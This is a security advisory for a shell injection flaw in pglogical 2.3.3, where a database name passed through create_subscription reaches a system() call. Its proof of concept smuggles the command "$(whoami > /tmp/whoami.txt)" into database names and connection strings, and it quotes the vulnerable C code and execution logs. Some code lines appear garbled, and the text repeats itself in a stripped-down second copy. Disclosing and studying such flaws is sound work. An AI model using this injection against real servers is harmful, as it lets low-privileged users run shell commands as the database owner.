Shell injection vulnerability when creating a subscription that utilizes synchronize_structure when calling pglogical.create_subscription. The underlying vulnerability is the database name is used in a string value that is passed to a call to system without any sanitization at and
A user that was granted USAGE on the pglogical schema would be able to execute shell commands as the user running postgresql.
A scenario where an unprivileged user could be granted USAGE on pglogical schema for arbitrary databases could be in migrating between database providers.
Proof of Concept
This setup contains 2 VMs both running Postgresql-11. I have built pglogical 2.3.3 from source.
Both instances follow the "Quick Setup" guide:
wal_level = 'logical'
max_worker_processes = 10 # one per database needed on provider node
# one per node needed on subscriber node
max_replication_slots = 10 # one per node needed on provider node
max_wal_senders = 10 # one per node needed on provider node
shared_preload_libraries = 'pglogical'
I've enabled the instances to talk to the network
With the following addition to pg_hba.conf
For the initial setup we'll be using the Superuser postgres
Both will create a database that contains the payload to execute we'll use a simple example of writing to a file in /tmp
CREATE DATABASE "$(whoami > /tmp/whoami.txt)";
Enable pglogical in the newly created database on both
\c "$(whoami > /tmp/whoami.txt)"
On the subscriber side we'll create a new user and grant them usage on pglogical
GRANT USAGE on SCHEMA pglogical TO test_user;
Setup the provider node on the provider instance
SELECT pglogical.create_node(node_name := 'test_provider',
dsn := $$host=<provider_ip> port=<provider_port> user=postgres password=<pass> dbname='$(whoami > /tmp/whoami.txt)'$$);
On the subscribe instance setup the node
SELECT pglogical.create_node(
node_name := 'test_sub',
dsn := $$host=<sub_ip> port=<sub_port> user=test_user password=<pass> dbname='$(whoami > /tmp/whoami.txt)'$$);
Create a subscription, ensuring you set synchronize_structure := TRUE
which will hit the vulnerable path.
To trigger the vulnerability at pglogical_sync.c:120 include the payload in the subscription’s dbname. To trigger the one at pglogical_sync.c:152 use a normal dbname.
-- Will Trigger shell injection at pglogical_sync.c:120
SELECT pglogical.create_subscription(subscription_name := 'test_sub',
provider_dsn := $$host=<provier_ip> port=<provider_port> user=postgres password=<pass> dbname='$(whoami > /tmp/whoami.txt)'$$,
synchronize_structure := TRUE);
-- Will trigger the shell injection at pglogical_sync.c:152
SELECT pglogical.create_subscription(subscription_name := 'test_sub',
provider_dsn := $$host=<provier_ip> port=<provider_port> user=postgres password=<pass> dbname=postgres'$$,
synchronize_structure := TRUE);
The command should execute. We can confirm this by looking for the file.
$ cat /tmp/whoami.txt
Further Analysis
When syncing occurs we see that dump_structure is executed if the sync type is structure or full. We satisfy this requirement when setting syncronize_structure to TRUE when creating a subscription.
if (SyncKindStructure(sync->kind))
/* Dump structure to temp storage. */
dump_structure(sub, tmpfile, snapshot);
Within dump_structure the user provided dsn is used to craft a string that will
be passed to system
appendStringInfo(&command, "\"%s\" --snapshot=\"%s\" %s -s -F c -f \"%s\" \"%s\"",
pg_dump, snapshot,, destfile,
res = system(;
Looking at the logs we can see what was executed
2021-02-05 18:35:43.233 UTC [26568] [unknown]@$(whoami > /tmp/whoami.txt) ERROR:
could not execute command ""/usr/lib/postgresql/11/bin/pg_dump"
--snapshot="0000000E-0000000D-1" -N pglogical -s -F c -f
"/tmp/pglogical-26568.dump" "host= port=5432 user=postgres password=a0de0238d8d4277c8efb97221972d48d359231c45152c73a1b24021520c15d69 dbname='$(whoami > /tmp/whoami.txt)'""
Our subshell is still executed even though it's in single quotes, because it's wrapped in double quotes.
Similar to dump_structure, restore_structure has the same vulnerable pattern.
"\"%s\" --section=\"%s\" --exit-on-error -1 -d \"%s\" \"%s\"",
pg_restore, section, sub->target_if->dsn, srcfile);
2021-02-08 21:59:45.544 UTC [21153] [unknown]@$(whoami > /tmp/whoami.txt) ERROR: could not execute command ""/usr/lib/postgresql/11/bin/pg_restore" --section=
"pre-data" --exit-on-error -1 -d "host= port=5432 user=test_user password=64eca3f8451089e4711b9fe0c6c24d264cfa11ff24c88f0f52067e5f223e140c dbname='$(whoami > /tmp/whoami.txt)'" "/tmp/pglogical-21153.dump"
Date reported: 2021-03-08
Date fixed: 2021-05-23
Date disclosed: 2021-06-07
Pedro Gallegos
Shell injection vulnerability when creating a subscription that utilizes synchronize_structure when calling pglogical.create_subscription. The underlying vulnerability is the database name is used in a string value that is passed to a call to system without any sanitization at and
A user that was granted USAGE on the pglogical schema would be able to execute shell commands as the user running postgresql.
A scenario where an unprivileged user could be granted USAGE on pglogical schema for arbitrary databases could be in migrating between database providers.
Proof of Concept
This setup contains 2 VMs both running Postgresql-11. I have built pglogical 2.3.3 from source.
Both instances follow the "Quick Setup" guide:
I've enabled the instances to talk to the network
With the following addition to pg_hba.conf
For the initial setup we'll be using the Superuser postgres
Both will create a database that contains the payload to execute we'll use a simple example of writing to a file in /tmp
CREATE DATABASE "$(whoami > /tmp/whoami.txt)";
Enable pglogical in the newly created database on both
\c "$(whoami > /tmp/whoami.txt)" CREATE EXTENSION pglogical;
On the subscriber side we'll create a new user and grant them usage on pglogical
Setup the provider node on the provider instance
On the subscribe instance setup the node
Create a subscription, ensuring you set
synchronize_structure := TRUE
which will hit the vulnerable path.To trigger the vulnerability at pglogical_sync.c:120 include the payload in the subscription’s dbname. To trigger the one at pglogical_sync.c:152 use a normal dbname.
The command should execute. We can confirm this by looking for the file.
Further Analysis
When syncing occurs we see that dump_structure is executed if the sync type is structure or full. We satisfy this requirement when setting syncronize_structure to TRUE when creating a subscription.
Within dump_structure the user provided dsn is used to craft a string that will
be passed to system
Looking at the logs we can see what was executed
Our subshell is still executed even though it's in single quotes, because it's wrapped in double quotes.
Similar to dump_structure, restore_structure has the same vulnerable pattern.
Date reported: 2021-03-08
Date fixed: 2021-05-23
Date disclosed: 2021-06-07
Pedro Gallegos